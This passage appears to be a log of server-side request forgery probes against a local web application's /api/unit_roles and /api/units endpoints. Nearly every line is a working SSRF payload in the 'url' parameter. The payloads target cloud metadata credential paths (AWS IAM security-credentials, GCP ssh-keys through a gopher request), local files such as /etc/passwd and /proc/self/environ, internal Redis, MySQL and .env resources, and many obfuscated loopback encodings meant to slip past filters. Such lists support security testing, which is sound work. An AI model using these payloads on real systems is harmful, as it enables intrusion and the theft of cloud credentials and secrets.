`http://localhost:4200/api/unit_roles?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/unit_roles?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/unit_roles?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/unit_roles?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.0` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777` +- Testing: `http://localhost:4200/api/unit_roles?url=425.510.425.510` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=instance-data` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/unit_roles?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/unit_roles?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/unit_roles?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=0%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/units +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/units?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/units?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/units?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/units?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/units?url=127.1%3A80` +- Testing: `http://localhost:4200/api/units?url=0` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/units?url=localhost%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/units?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127` +- Testing: `http://localhost:4200/api/units?url=127.0.1.3` +- Testing: `http://localhost:4200/api/units?url=127.0.0.0` +- Testing: `http://localhost:4200/api/units?url=2130706433` +- Testing: `http://localhost:4200/api/units?url=017700000001` +- Testing: `http://localhost:4200/api/units?url=0x7f000001` +- Testing: `http://localhost:4200/api/units?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/units?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/units?url=google.com.localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/units?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/units?url=2130706433%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521%2F` +- Testing: `http://localhost:4200/api/units?url=3232235777%2F` +- Testing: `http://localhost:4200/api/units?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/units?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/units?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/units?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/units?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/units?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=0%2F` +- Testing: `http://localhost:4200/api/units?url=127.1` +- Testing: `http://localhost:4200/api/units?url=127.0.1` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/units?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/units?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.1.3` +- Testing: `http://localhost:4200/api/units?url=0` +- Testing: `http://localhost:4200/api/units?url=127.1` +- Testing: `http://localhost:4200/api/units?url=127.0.1` +- Testing: `http://localhost:4200/api/units?url=localhost` +- Testing: `http://localhost:4200/api/units?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/units?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/units?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/units?url=7F000001` +- Testing: `http://localhost:4200/api/units?url=2130706433` +- Testing: `http://localhost:4200/api/units?url=6425673729` +- Testing: `http://localhost:4200/api/units?url=127001` +- Testing: `http://localhost:4200/api/units?url=127_0._0_1` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/units?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127` +- Testing: `http://localhost:4200/api/units?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=0x7f000001` +- Testing: `http://localhost:4200/api/units?url=017700000001` +- Testing: `http://localhost:4200/api/units?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/units?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/units?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/units?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/units?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/units?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254` +- Testing: `http://localhost:4200/api/units?url=2852039166` +- Testing: 